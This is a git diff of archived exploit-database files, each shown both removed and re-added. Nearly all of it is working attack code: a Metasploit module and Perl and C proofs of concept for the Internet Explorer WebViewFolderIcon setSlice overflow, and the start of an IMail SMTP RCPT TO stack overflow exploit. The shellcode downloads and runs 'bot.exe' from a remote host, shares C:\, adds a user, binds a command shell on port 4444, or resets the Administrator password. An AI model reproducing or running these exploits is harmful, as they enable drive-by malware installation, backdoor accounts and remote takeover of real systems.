autofilter - false - end - - def on_request_uri(cli, request) - - # Re-generate the payload - return if ((p = regenerate_payload(cli)) == nil) - - # Encode the shellcode - shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Get a unicode friendly version of the return address - addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] - - # Randomize the javascript variable names - var_buffer = Rex::Text.rand_text_alpha(rand(30)+2) - var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2) - var_unescape = Rex::Text.rand_text_alpha(rand(30)+2) - var_x = Rex::Text.rand_text_alpha(rand(30)+2) - var_i = Rex::Text.rand_text_alpha(rand(30)+2) - var_tic = Rex::Text.rand_text_alpha(rand(30)+2) - var_toc = Rex::Text.rand_text_alpha(rand(30)+2) - - # Randomize HTML data - html = Rex::Text.rand_text_alpha(rand(30)+2) - - # Build 
out the message - content = %Q| - - - - - -#{html} - - - | - - # Randomize the whitespace in the document - content.gsub!(/\s+/) do |s| - len = rand(100)+2 - set = "\x09\x20\x0d\x0a" - buf = '' - - while (buf.length < len) - buf << set[rand(set.length)].chr - end - - buf - end - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") - - # Transmit the response to the client - send_response(cli, content) - end - -end - -end - -# milw0rm.com [2006-09-27] +# This module is part of the metasploit framework3 +# svn co http://metasploit.com/svn/framework3/trunk/ + +require 'msf/core' + +module Msf + +class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote + + include Exploit::Remote::HttpServer::Html + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', + 'Description' => %q{ + This module exploits a flaw in the WebViewFolderIcon ActiveX control + included with Windows 2000, Windows XP, and Windows 2003. This flaw was published + during the Month of Browser Bugs project (MoBB #18). 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'hdm', + ], + 'Version' => '$Revision: 3783 $', + 'References' => + [ + [ 'OSVDB', '27110' ], + [ 'BID', '19030' ], + [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] + ], + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def on_request_uri(cli, request) + + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Get a unicode friendly version of the return address + addr_word = [target.ret].pack('V').unpack('H*')[0][0,4] + + # Randomize the javascript variable names + var_buffer = Rex::Text.rand_text_alpha(rand(30)+2) + var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2) + var_unescape = Rex::Text.rand_text_alpha(rand(30)+2) + var_x = Rex::Text.rand_text_alpha(rand(30)+2) + var_i = Rex::Text.rand_text_alpha(rand(30)+2) + var_tic = Rex::Text.rand_text_alpha(rand(30)+2) + var_toc = Rex::Text.rand_text_alpha(rand(30)+2) + + # Randomize HTML data + html = Rex::Text.rand_text_alpha(rand(30)+2) + + # Build out the message + content = %Q| + + + + + +#{html} + + + | + + # Randomize the whitespace in the document + content.gsub!(/\s+/) do |s| + len = rand(100)+2 + set = "\x09\x20\x0d\x0a" + buf = '' + + while (buf.length < len) + buf << set[rand(set.length)].chr + end + + buf + end + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response(cli, content) + end + +end + +end + +# milw0rm.com [2006-09-27] diff --git a/platforms/windows/remote/2448.html b/platforms/windows/remote/2448.html index b11755cdf..c4e6cabe5 100755 --- a/platforms/windows/remote/2448.html 
+++ b/platforms/windows/remote/2448.html
@@ -1,67 +1,67 @@
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2006-09-28]
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2006-09-28]
diff --git a/platforms/windows/remote/2458.pl b/platforms/windows/remote/2458.pl
index e2a917047..b7c517ddc 100755
--- a/platforms/windows/remote/2458.pl
+++ b/platforms/windows/remote/2458.pl
@@ -1,108 +1,108 @@ -#!/usr/bin/perl - -# -# Microsoft Internet Explorer WebViewFolderIcon setSlice() D0wnLoad & Exec POC -# -# Author: Vampyroteuthis Infernalis -# Greetz: H D Moor, Dark Eagle, Jamikazu -# -# - - -use strict; - -my $sco = -"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03". -"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74". -"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E". -"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03". -"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C". -"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40". -"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C". -"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC". -"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F". -"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB". -"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83". -"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF". -"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF". 
-"http://dedicated.com/bot.exe"; - -my $war_code= convert_sco($sco); - -my @exploit_body=< - - - - - - -FOOKER - -open (IE_VML, ">", "exploit.html"); - -print IE_VML @exploit_body; - -close IE_VML; - -sub convert_sco { - my $data = shift; - my $mode = shift() || 'LE'; - my $code = ''; - - my $idx = 0; - - if (length($data) % 2 != 0) { - $data .= substr($data, -1, 1); - } - - while ($idx < length($data) - 1) { - my $c1 = ord(substr($data, $idx, 1)); - my $c2 = ord(substr($data, $idx+1, 1)); - if ($mode eq 'LE') { - $code .= sprintf('%%u%.2x%.2x', $c2, $c1); - } else { - $code .= sprintf('%%u%.2x%.2x', $c1, $c2); - } - $idx += 2; - } - - return $code; -} - -# milw0rm.com [2006-09-29] +#!/usr/bin/perl + +# +# Microsoft Internet Explorer WebViewFolderIcon setSlice() D0wnLoad & Exec POC +# +# Author: Vampyroteuthis Infernalis +# Greetz: H D Moor, Dark Eagle, Jamikazu +# +# + + +use strict; + +my $sco = +"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03". +"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74". +"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E". +"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03". +"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C". +"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40". +"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C". +"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC". +"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F". +"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB". +"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83". +"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF". +"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF". 
+"http://dedicated.com/bot.exe"; + +my $war_code= convert_sco($sco); + +my @exploit_body=< + + + + + + +FOOKER + +open (IE_VML, ">", "exploit.html"); + +print IE_VML @exploit_body; + +close IE_VML; + +sub convert_sco { + my $data = shift; + my $mode = shift() || 'LE'; + my $code = ''; + + my $idx = 0; + + if (length($data) % 2 != 0) { + $data .= substr($data, -1, 1); + } + + while ($idx < length($data) - 1) { + my $c1 = ord(substr($data, $idx, 1)); + my $c2 = ord(substr($data, $idx+1, 1)); + if ($mode eq 'LE') { + $code .= sprintf('%%u%.2x%.2x', $c2, $c1); + } else { + $code .= sprintf('%%u%.2x%.2x', $c1, $c2); + } + $idx += 2; + } + + return $code; +} + +# milw0rm.com [2006-09-29] diff --git a/platforms/windows/remote/2460.c b/platforms/windows/remote/2460.c index 82a8486e8..aef4c524d 100755 --- a/platforms/windows/remote/2460.c +++ b/platforms/windows/remote/2460.c 
@@ -1,169 +1,169 @@ -/* -*----------------------------------------------------------------------- -* -* Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day) -* Works on all Windows XP versions including SP2 -* -* Author: LukeHack -* Mail: lukehack@fastwebnet.it -* -* Bug discovered by Computer H D Moore (http://www.metasploit.com) -* -* Credit: metasploit, jamikazu, yag kohna(for the shellcode) -* -* : -* Tested : -* : Windows XP SP2 + Internet Explorer 6.0 SP1 -* : -* Complie : cl pociewvf.c -* : -* Usage : c:\>pociewvf -* : -* :Usage: pociewvf [htmlfile] -* : -* -* -*------------------------------------------------------------------------ -*/ - -#include -#include -#include - -FILE *fp = NULL; -char *file = "lukehack.htm"; -char *url = NULL; - -unsigned char sc[] = -"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" -"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" -"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" -"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" -"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" -"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" -"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" -"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" -"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" -"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" -"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" -"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" -"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; - -char * header = -"\n" -"\n" -"\n" -"\n" -"\n"; - -// print unicode shellcode -void PrintPayLoad(char *lpBuff, int buffsize) -{ - int i; - for(i=0;i [htmlfile]\r\n\n", argv[0]); - exit(1); - } - - url = argv[1]; - - - if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) - { - printf("[-] Invalid url. 
Must start with 'http://','ftp://'\n"); - return; - } - - printf("[+] download url:%s\n", url); - - if(argc >=3) file = argv[2]; - printf("[+] exploit file:%s\n", file); - - fp = fopen(file, "w"); - if(!fp) - { - printf("[-] Open file error!\n"); - return; - } - - fprintf(fp, "%s", header); - fflush(fp); - - memset(buf, 0, sizeof(buf)); - sc_len = sizeof(sc)-1; - memcpy(buf, sc, sc_len); - memcpy(buf+sc_len, url, strlen(url)); - - sc_len += strlen(url)+1; - PrintPayLoad(buf, sc_len); - - fprintf(fp, "%s", footer); - fflush(fp); - - printf("[+] exploit write to %s success!\n", file); -} - -// LukeHack coded it! - -// milw0rm.com [2006-09-29] +/* +*----------------------------------------------------------------------- +* +* Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day) +* Works on all Windows XP versions including SP2 +* +* Author: LukeHack +* Mail: lukehack@fastwebnet.it +* +* Bug discovered by Computer H D Moore (http://www.metasploit.com) +* +* Credit: metasploit, jamikazu, yag kohna(for the shellcode) +* +* : +* Tested : +* : Windows XP SP2 + Internet Explorer 6.0 SP1 +* : +* Complie : cl pociewvf.c +* : +* Usage : c:\>pociewvf +* : +* :Usage: pociewvf [htmlfile] +* : +* +* +*------------------------------------------------------------------------ +*/ + +#include +#include +#include + +FILE *fp = NULL; +char *file = "lukehack.htm"; +char *url = NULL; + +unsigned char sc[] = +"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" +"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" +"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" +"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" +"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" +"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" +"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" +"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" 
+"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" +"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" +"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" +"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" +"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"; + +char * header = +"\n" +"\n" +"\n" +"\n" +"\n"; + +// print unicode shellcode +void PrintPayLoad(char *lpBuff, int buffsize) +{ + int i; + for(i=0;i [htmlfile]\r\n\n", argv[0]); + exit(1); + } + + url = argv[1]; + + + if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10) + { + printf("[-] Invalid url. Must start with 'http://','ftp://'\n"); + return; + } + + printf("[+] download url:%s\n", url); + + if(argc >=3) file = argv[2]; + printf("[+] exploit file:%s\n", file); + + fp = fopen(file, "w"); + if(!fp) + { + printf("[-] Open file error!\n"); + return; + } + + fprintf(fp, "%s", header); + fflush(fp); + + memset(buf, 0, sizeof(buf)); + sc_len = sizeof(sc)-1; + memcpy(buf, sc, sc_len); + memcpy(buf+sc_len, url, strlen(url)); + + sc_len += strlen(url)+1; + PrintPayLoad(buf, sc_len); + + fprintf(fp, "%s", footer); + fflush(fp); + + printf("[+] exploit write to %s success!\n", file); +} + +// LukeHack coded it! + +// milw0rm.com [2006-09-29] diff --git a/platforms/windows/remote/2601.c b/platforms/windows/remote/2601.c index cec5418a1..71bd4bc5c 100755 --- a/platforms/windows/remote/2601.c +++ b/platforms/windows/remote/2601.c 
@@ -1,402 +1,402 @@ -// IMail 2006 and 8.x SMTP Stack Overflow Exploit -// coded by Greg Linares [glinares.code[at]gmail[dot]com -// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html -// This works on the following versions: -// 2006 IMail prior to 2006.1 update - - -#include -#include -#include -#include - -#pragma comment(lib,"wsock32.lib") - -int main(int argc, char *argv[]) -{ -static char overflow[1028]; - - - -// PAYLOADS -// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More) - -/* win32_exec - EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */ -unsigned char RootShare[] = -"\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58" -"\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\xeb\x6e\x21\x46" -"\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x60\xee\xa7\x69" -"\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x7c\xe6\x49\x89" -"\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\xb1\x49\xe7\x62" -"\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x78\x0e\xf4\x34" -"\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x99\xa7\x07\x3c" -"\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\xff\x4c\x38\xa5" -"\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x75\x89\xc0\xac" -"\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\xb3\x8d\x97\xdc" -"\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\xa8\x05\x4b\x26" -"\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad"; - - -/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */ -unsigned char Win32Bind[] = -"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93" -"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9" -"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd" -"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf" -"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e" -"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd" 
-"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd" -"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66" -"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6" -"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34" -"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65" -"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7" -"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e" -"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f" -"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61" -"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66" -"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b" -"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9" -"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67" -"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6" -"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69" -"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36"; - -/* win32_adduser - PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */ -unsigned char AddUser[] = -"\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2" -"\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\xb2\xe6\x24\x2f" -"\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x92\xe7\x44\x23" -"\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\xb5\x27\x65\x67" -"\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x96\xe7\x44\x0c" -"\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x59\x6f\xf3\x4e" -"\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x39\xa6\xa3\xe1" -"\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\xb2\xe6\x24\x02" -"\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\xda\x16\x25\x6e" -"\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x9c\x83\xd7\x0f" -"\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x92\xa3\xdd\x18" 
-"\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xc6\x89\x4c" -"\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\xdd\x93\xdf\x4a" -"\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\xc0\x95\x8f\x2f" -"\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a"; - -/* win32_exec - CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */ -unsigned char ChangeAdmin[] = -"\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x74" -"\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x74\xb8\xc4\xff" -"\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x54\xb9\xa4\xf3" -"\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x73\x79\x85\xb7" -"\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x50\xb9\xa4\xdc" -"\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x9f\x31\x13\x9e" -"\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\xff\xf8\x43\x31" -"\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x74\xb8\xc4\xd2" -"\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x1c\x48\xc5\xbe" -"\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x54\xcd\x3c\xdf" -"\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x74\xb8\x4f\xba"; - - - WSADATA wsaData; - - struct hostent *hp; - struct sockaddr_in sockin; - char buf[300], *check; - int sockfd, bytes; - int plen, i, JMP; - char *hostname; - unsigned short port; - - printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n"); - printf("Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >\n"); - if (argc <= 1) - { - printf("Usage: %s [hostname] [port] \n", argv[0]); - printf("Default port is 25 \r\n"); - printf("==============================\n"); - printf("Payload Options: 1 = Default\n"); - printf("==============================\n"); - printf("1 = Share C:\\ as 'Export' Share\n"); - printf("2 = Add User 'Error' with Password 'Error'\n"); - printf("3 = Win32 Bind CMD to Port 4444\n"); - printf("4 = Change Administrator Password to 'p@ssw0rd'\n"); - printf("==============================\n"); - printf("JMP 
Options: 1 = Default\n"); - printf("==============================\n"); - printf("1 = IMAIL 8.x SMTPDLL.DLL [pop ebp, ret] 0x10036f71 \n"); - printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n"); - printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n"); - printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n"); - printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n"); - printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n"); - printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n"); - printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n"); - - exit(0); - } - - hostname = argv[1]; - if (argv[2]) port = atoi(argv[2]); - else port = atoi("25"); - if (argv[4]) JMP = atoi(argv[4]); - else JMP = atoi("1"); - - if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) - { - fprintf(stderr, "Error setting up with WinSock v1.1\n"); - exit(-1); - } - - - hp = gethostbyname(hostname); - if (hp == NULL) - { - printf("ERROR: Uknown host %s\n", hostname); - printf("%s",hostname); - exit(-1); - } - - sockin.sin_family = hp->h_addrtype; - sockin.sin_port = htons(port); - sockin.sin_addr = *((struct in_addr *)hp->h_addr); - - if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) - { - printf("ERROR: Socket Error\n"); - exit(-1); - } - - if ((connect(sockfd, (struct sockaddr *) &sockin, - sizeof(sockin))) == SOCKET_ERROR) - { - printf("ERROR: Connect Error\n"); - closesocket(sockfd); - WSACleanup(); - exit(-1); - } - - printf("Connected to [%s] on port [%d], sending overflow....\n", - hostname, port); - - - if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) - { - printf("ERROR: Recv Error\n"); - closesocket(sockfd); - WSACleanup(); - exit(1); - } - - /* wait for SMTP service welcome*/ - buf[bytes] = '\0'; - check = strstr(buf, "220"); - if (check == NULL) - { - printf("ERROR: NO response from SMTP service\n"); - 
closesocket(sockfd); - WSACleanup(); - exit(-1); - } - - - // JMP to EAX = Results in a Corrupted Stack - // so instead we POP EBP, RET to restore pointer and then return - // this causes code procedure to continue - /* - ['IMail 8.x Universal', 0x10036f71 ], - ['Windows 2003 SP1 English', 0x7c87d8af ], - ['Windows 2003 SP0 English', 0x77d5c14c ], - ['Windows XP SP2 English', 0x7c967e23 ], - ['Windows XP SP1 English', 0x71ab389c ], - ['Windows XP SP0 English', 0x71ab389c ], - ['Windows 2000 Universal English', 0x75021397 ], - ['Windows 2000 Universal French', 0x74fa1397], - ['Windows XP SP1 - SP2 German', 0x77d18c14], - */ - char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and : - char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af - char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 - char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71 - char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c - char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23 - char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c - char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397 - char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397 - char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14 - - char tail[] = "SSS>\n"; // This closes the RCPT cmd. Any characters work. - // Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems - // After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works - // On all versions from 8.x to 2006 (9.x?) - char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize Stack prior to payload. 
